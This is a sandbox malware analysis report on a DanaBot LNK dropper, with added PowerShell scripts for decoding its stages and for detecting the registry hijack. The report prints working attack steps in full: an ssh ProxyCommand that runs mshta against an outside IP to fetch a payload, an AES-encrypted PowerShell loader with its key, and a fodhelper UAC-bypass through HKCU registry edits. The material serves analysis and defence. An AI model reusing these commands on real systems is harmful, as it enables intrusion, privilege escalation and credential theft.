
Windows Analysis Report
A4FY1OA97K.lnk

Overview

General Information

Sample name: A4FY1OA97K.lnk
renamed because original name is a hash value
Original sample name: 0306addb386436ae663da152bee03226.lnk
Analysis ID: 1581248
MD5: 0306addb386436ae663da152bee03226
SHA1: 0c35bff3dafec0f21436b6db025a24e0102ce7b7
SHA256: 32a98d1b299d1feebb096cdeb38433013b7db6adf5d9923b539390d777bfac3f
Tags: lnk, user-abuse_ch

Detection

DanaBot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected DanaBot stealer dll
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
May use the Tor software to hide its network traffic
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the installation date of Windows
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ssh.exe (PID: 4204 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 6372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6436 cmdline: powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 6404 cmdline: "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 7432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf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ob=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KYLfE('4344494372736B6F7955464B61484843')),[byte[]]::new(16)).TransformFinalBlock($ggUL,0,$ggUL.Length)); & $PYGob.Substring(0,3) $PYGob.Substring(283) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7652 cmdline: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 7668 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 7684 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • fodhelper.exe (PID: 7700 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • powershell.exe (PID: 7848 cmdline: powershell.exe -w 1 -ep Unrestricted -nop MD5: 04029E121A0CFA5991749937DD22A1D9)
                      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7976 cmdline: "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 7996 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 8016 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • Acrobat.exe (PID: 8180 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 1416 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 1916 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1640,i,18218259324661631593,8502747299906731977,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • cmd.exe (PID: 4484 cmdline: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 3036 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 6768 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • fodhelper.exe (PID: 1496 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                • cmd.exe (PID: 2908 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cmd.exe (PID: 5700 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • mama.exe (PID: 1532 cmdline: C:\Users\user\AppData\Roaming\mama.exe MD5: 72B6B07175EF611CE7DAA959A1248AAE)
                      • cmd.exe (PID: 8004 cmdline: cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                        • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • WMIC.exe (PID: 5580 cmdline: wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • cmd.exe (PID: 4376 cmdline: "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 5296 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 5756 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • svchost.exe (PID: 7204 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
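The process tree above shows two decoding stages that are worth reproducing safely: the ssh.exe ProxyCommand hides the real command inside junk and cuts it out with .SubString(15, 35), and the mshta-spawned PowerShell converts a hex string to bytes, AES-decrypts it with a hard-coded key and a zero IV, then invokes the first three characters of the result as a command with everything from offset 283 as its argument. The script below is an added example, not code from the report or from the malware: the stage-1 string and the 16-byte key hex are copied from the command lines above; the ciphertext and the "iex" plaintext are constructed here because the report's ciphertext is truncated and the decrypted stage is not on the page. It prints what each stage would execute instead of running it.

```powershell
# Added example, not part of the Joe Sandbox report. Reproduces the two
# decoding steps from the process tree on constructed input and prints the
# result instead of executing it.

# --- Stage 1: ssh.exe -o ProxyCommand="powershell -Command '<junk>'.SubString(15, 35)"
# String copied from the ssh.exe command line in the report: 15 junk chars,
# 35 chars of real command, 15 junk chars.
$stage1 = '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'
$stage1Command = $stage1.SubString(15, 35)
"Stage 1 would run: $stage1Command"        # mshta https://150.241.97.10/aaa.mp4

# --- Stage 2: hex -> bytes -> AES-CBC decrypt (zero IV) -> & <3 chars> <rest from 283>
function Convert-HexToBytes([string]$Hex) {
    # Same trick as the loader's KYLfE function: prefix every byte pair with
    # '0x' and split on spaces; PowerShell coerces each '0x..' token to a byte
    # when the array is cast. Trim() drops the trailing separator.
    return [byte[]](($Hex -replace '..', '0x$& ').Trim() -split ' ')
}

function Unprotect-Stage2([string]$CipherHex, [byte[]]$Key) {
    # Aes::Create() defaults to CBC with PKCS7 padding; the loader passes
    # [byte[]]::new(16) as the IV, i.e. sixteen zero bytes.
    $aes    = [Security.Cryptography.Aes]::Create()
    $cipher = Convert-HexToBytes $CipherHex
    try {
        $plain = $aes.CreateDecryptor($Key, [byte[]]::new(16)).TransformFinalBlock($cipher, 0, $cipher.Length)
    } finally { $aes.Dispose() }
    return -join [char[]]$plain
}

# Key hex copied from the report's powershell.exe command line.
$key = Convert-HexToBytes '4344494372736B6F7955464B61484843'
"Stage 2 key bytes read as: $(-join [char[]]$key)"    # CDICrskoyUFKaHHC

# Constructed stand-in ciphertext (the report's is truncated): encrypt a stub
# with the same key and IV. The loader executes Substring(0,3) as the command
# and passes Substring(283) as its argument, so characters 3..282 are padding.
$stub    = 'iex' + ('.' * 280) + 'Write-Host "stage 3 script would go here"'
$ptBytes = [Text.Encoding]::ASCII.GetBytes($stub)
$aesEnc  = [Security.Cryptography.Aes]::Create()
$ctBytes = $aesEnc.CreateEncryptor($key, [byte[]]::new(16)).TransformFinalBlock($ptBytes, 0, $ptBytes.Length)
$aesEnc.Dispose()
$cipherHex = ($ctBytes | ForEach-Object { $_.ToString('X2') }) -join ''

$decoded = Unprotect-Stage2 $cipherHex $key
$verb = $decoded.Substring(0, 3)     # what the loader hands to '&'
$arg  = $decoded.Substring(283)      # the script text it would execute
"Stage 2 would run: & $verb <script of $($arg.Length) chars>"
"Decoded script:`n$arg"
```

To decode a real sample, replace $cipherHex with the full hex argument from the -Command string and read the decoded text; never replace the final two lines with the loader's `& $verb $arg`. Note that the hex-to-byte coercion silently relies on PowerShell parsing "0x.." tokens as numbers, which is why the loader can avoid any call to Convert or BitConverter that a static rule might key on.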
Name: DanaBot
Description: Proofpoint describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on quality over quantity in email-based threats. DanaBot's modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.
Attribution: SCULLY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot
No configs have been found
Source | Rule | Description | Author | Strings
0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DanaBot_stealer_dll | Yara detected DanaBot stealer dll | Joe Security
0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_DanaBot_stealer_dll | Yara detected DanaBot stealer dll | Joe Security
Process Memory Space: powershell.exe PID: 7432 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
        • 0x2e12d:$b1: ::WriteAllBytes(
        • 0x2ea8f:$b1: ::WriteAllBytes(
        • 0x15bd1:$s1: -join
        • 0x16331:$s1: -join
        • 0x225f0:$s1: -join
        • 0x2e1e2:$s1: -join
        • 0x2eb44:$s1: -join
        • 0x42ed1:$s1: -join
        • 0x63733:$s1: -join
        • 0x6460c:$s1: -join
        • 0x94d3f:$s1: -join
        • 0x95ee3:$s1: -join
        • 0xbf2d7:$s1: -join
        • 0xc03bf:$s1: -join
        • 0xc1411:$s1: -join
        • 0xc63d8:$s1: -join
        • 0xc6413:$s1: -join
        • 0xc64da:$s1: -join
        • 0xc6508:$s1: -join
        • 0xc66b8:$s1: -join
        • 0xc66db:$s1: -join
Process Memory Space: mama.exe PID: 1532 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

          System Summary

Source: Process started | Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community | Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: FoDHelper.exe, ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 7700, ParentProcessName: fodhelper.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" ", ProcessId: 7740, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4, ProcessId: 6404, ProcessName: mshta.exe
Source: File created | Author: Subhash Popuri (@pbssubhash) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7432, TargetFilename: C:\Users\user\AppData\Local\Temp\r.bat
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E
3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D2
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf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
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" ., ProcessId: 4204, ProcessName: ssh.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7432, TargetFilename: C:\Users\user\AppData\Local\Temp\r.bat
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F , CommandLine: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F , CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7652, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F , ProcessId: 7668, ProcessName: reg.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35), CommandLine: powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 4204, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35), ProcessId: 6436, ProcessName: powershell.exe
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf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
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7204, ProcessName: svchost.exe
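The fodhelper events above show the UAC bypass in full: REG ADD writes a ServiceHostXGRT ProgID whose Shell\Open\Command points at %TMP%\r.bat, sets HKCU\Software\Classes\MS-Settings\CurVer to that ProgID, launches the auto-elevating FoDHelper.exe (which resolves ms-settings from the user hive), and then REG DELETE removes both keys. The script below is an added example, not code from the report: it checks the current user's hive for that hijack, reports what it points at, and removes it the way the report's cleanup step does. The CurVer variant follows the report; the direct shell\open\command variant is the older, more common form of the same bypass and is not in this sample.

```powershell
# Added example, not part of the Joe Sandbox report. Looks for the
# ms-settings ProgID hijack that fodhelper.exe resolves from HKCU, reports
# what it points at, and removes it the way the report's cleanup step does.
# Run as the user whose profile was exposed; fodhelper reads that user's hive.

function Get-MsSettingsHijack {
    [CmdletBinding()]
    param()
    $base = 'HKCU:\Software\Classes\ms-settings'
    $hits = @()
    # The legitimate ms-settings ProgID lives under HKLM; a per-user copy
    # exists only if something wrote it, so its presence alone is suspicious.
    if (-not (Test-Path $base)) { return $hits }

    # Variant seen in the report: CurVer redirects ms-settings to another
    # ProgID (ServiceHostXGRT) whose shell\open\command holds the payload.
    $progId = (Get-ItemProperty -Path "$base\CurVer" -ErrorAction SilentlyContinue).'(default)'
    if ($progId) {
        $cmdKey  = "HKCU:\Software\Classes\$progId\shell\open\command"
        $payload = (Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue).'(default)'
        $hits += [pscustomobject]@{ Key = "$base\CurVer"; ProgId = $progId; Payload = $payload }
    }

    # Older variant (not in this report): the command sits directly under
    # ms-settings, usually with an empty DelegateExecute value so the shell
    # runs the command instead of the registered COM handler.
    $direct = "$base\shell\open\command"
    if (Test-Path $direct) {
        $props = Get-ItemProperty -Path $direct
        $hits += [pscustomobject]@{ Key = $direct; ProgId = $null; Payload = $props.'(default)' }
    }
    return $hits
}

function Remove-MsSettingsHijack {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $hits = @(Get-MsSettingsHijack)
    if ($hits.Count -eq 0) { Write-Verbose 'No ms-settings hijack in HKCU'; return }

    # Same keys the report's REG DELETE lines remove: ms-settings itself and
    # every ProgID that CurVer redirected to.
    $keys = @('HKCU:\Software\Classes\ms-settings') +
            @($hits | Where-Object ProgId | ForEach-Object { "HKCU:\Software\Classes\$($_.ProgId)" })
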